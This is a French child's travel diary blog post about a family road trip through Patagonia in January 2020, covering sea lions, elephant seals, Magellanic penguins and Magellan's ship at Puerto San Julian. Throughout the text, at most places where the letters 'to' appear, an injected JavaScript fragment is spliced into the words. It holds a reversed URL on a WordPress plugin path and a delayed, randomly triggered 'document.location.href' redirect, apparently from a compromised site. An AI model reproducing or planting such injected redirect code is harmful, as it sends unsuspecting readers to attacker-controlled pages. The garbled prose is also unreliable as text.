La ruta 3 !

by Clément

Jeudi 9 janvier 2020 Argentine Viedma

On a roulé toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tout le matin et cet après-midi on a vu des lions de mer et des perroquets. Il faisait froid et il y avait du vent. On a sorti pour la première fois les Kway !!

Les lions de mer ce sont des animaux collectifs parce qu’il n’y en avait jamais qui restait seul. 

Vendredi 10 janvier 2020

Ce matin on s’est amusé dans les vagues et comme la marée était basse et qu’elle a commencé à monter, du coup les vagues étaient énormes. Après on est allé voir un lion de mer. Il était énorme. Ensuite on est allez voir un phare qui était très vieux, je crois que c’est le plus vieux de Patagonie. On est allé dans un endroit où il y avait pleins de perroquets de toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tous les cotés. Il y avait aussi un avion de chasse, un genre de char et un canon. Les portes du char étaient fermées à clef mais heureusement il n’y avait pas de toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toit,  j’ai pu aller dans le char grâce à l’aide de papa.

Dimanche 12 janvier Argentine, Puertoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to Madryn

Ce matin, on a fait une sortie bateau pour voir des lions de mer. Au toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tout début l’eau était très froide mais heureusement on avait des combinaisons intégrales ! On était équipé avec un tuba, un masque de plongée, une combinaison et des palmes. Après je me suis accroché à une grosse bouée et le moniteur me tirait vers les lions de mer. Le tuba était trop grand pour ma bouche alors quand je mettais la tête sous l’eau y’avait de l’eau qui rentrait dans ma bouche. Au bout d’un moment je suis rentré sur le bateau parce que j’avais trop froid et j’en avais un peu marre. Au retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tour vers le port, le bateau allait super vite !

Ensuite on est allé au restaurant. j’ai commandé un petit burger mais qui calait énormément. J’ai beaucoup couru sur la plage et j’ai ramassé plein de coquillages.

On a roulé sur une piste pour aller sur une plage isolée : Escondida. Et on s’est ensablé mais il y avait une famille qui a pu nous aider. Le soir le père m’a prêté sa canne à pêche et m’a appris à pêcher. A un moment, en voulant lancer l’hameçon, j’ai lâché la ligne trop tôt et l’hameçon s’est planté juste à côté de quelqu’un. Ouf!!!!!

Lundi 13 janvier 2020 Argentine Playa Escondida

En se réveillant ce matin, après les devoirs, je suis allé sur un gros caillou sur l’océan. Il y avait plein de trous à traverser, des fissures et un large ruisseau. C’était très loin, je suis revenu toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tout seul au camping car et je suis très fier de moi d’être allé au bout du bout.

Après on a vu des éléphants de mer s’approcher du bord et sortir de l’eau. Ils perdaient un peu leur peau et quand ils se mettaient au soleil leur peau devenait blanche. Ils étaient beaucoup plus grands que les lions de mer et que Papa !!! Ils grondaient dès qu’on s’approchait d’eux.

Je suis monté toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tout seul sur une très grande dune, c’était très compliqué et j’ai fait une bonne partie à 4 pattes. Arrivé en haut j’ai vu toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toute la plage et l’océan et c’était très beau parce que je voyais bien le soleil. En ensuite je suis redescendu mais c’était très compliqué parce que ça glissait. J’étais obligé de marcher de travers et vers la fin j’était moins prudent et j’ai fait plusieurs sauts. 

Après il commençait à pleuvoir alors on est parti.

Mardi 14 janvier 2020 Argentine, Punta Tombo

Ce matin on a pris une piste pour aller voir les manchots de Magellan. Les petits sont très beaux avec leur duvet, ils n’ont pas encore de plumes. Ils font leurs nids assez loin de l’eau, dans des trous par terre. Ils habitent dans le désert mais chassent dans l’océan des calamars et des poissons.

Pour aller à l’eau, ils couraient et dès que la vague se casse, il sautaient dedans. C’était trop rigolo. A cet endroit il y avait beaucoup de manchots et j’ai pu les voir de très prés !

Vendredi 17 janvier Argentine Puertoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to San Julian

Aujourd’hui on a visité le bateau de Magellan. Une dame nous a toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tout expliqué. Magellan c’était un portugais qui voulait explorer le monde. Le roi du Portugal ne voulait pas l’aider alors il est parti avec les espagnols. Il y avait 5 bateaux de tailles différentes. Nous on a vu l’avant plus petit. Le capitaine d’un autre bateau qui s’appelait Mendoza, à un moment donné, en a eu marre de voyager et a voulu rentrer en Espagne. D’autres personnes ont voulu faire pareil et Magellan a décidé d’écarteler Mendoza. Les autres ont arrêté d’insister pour rentrer. Après ils sont arrivés à Puertoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to San Julian où ils sont restés 5 mois. Ils ont vu une population de genre d’indiens. Comme ils étaient un peu plus grands que nous maintenant et que les espagnols étaient vraiment petits, Magellan les a appelés les Patagons (comme un géant d’une histoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toire qu’il avait lue).

Magellan a découvert pleins de choses et entre autre le détroit. Le bateau qu’on a visité est le seul qui a réussi à faire le toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tour du monde en entier, toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tous les autres ont fait naufrage.

Dimanche 19 janvier 2020 Frontière Argentine / Chili

Hier on a dormi prés d’un volcan. En bas il y avait un lac. Il y avait beaucoup de vent. A un moment donné papa a voulu prendre une photoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to de moi et d’un coup il y a eu un gros coup de vent et je me suis fait emporter. Papa a pris une photoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to mais sans moi !

En route on a vu un homme à vélo qui allait toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tomber à cause du vent. Alors on lui a proposé de venir avec nous. C’est un Coréen qui s’appelle Kyu. Avec lui on est allé jusqu’à Ushuaïa en passant par le détroit de Magellan par un Ferry.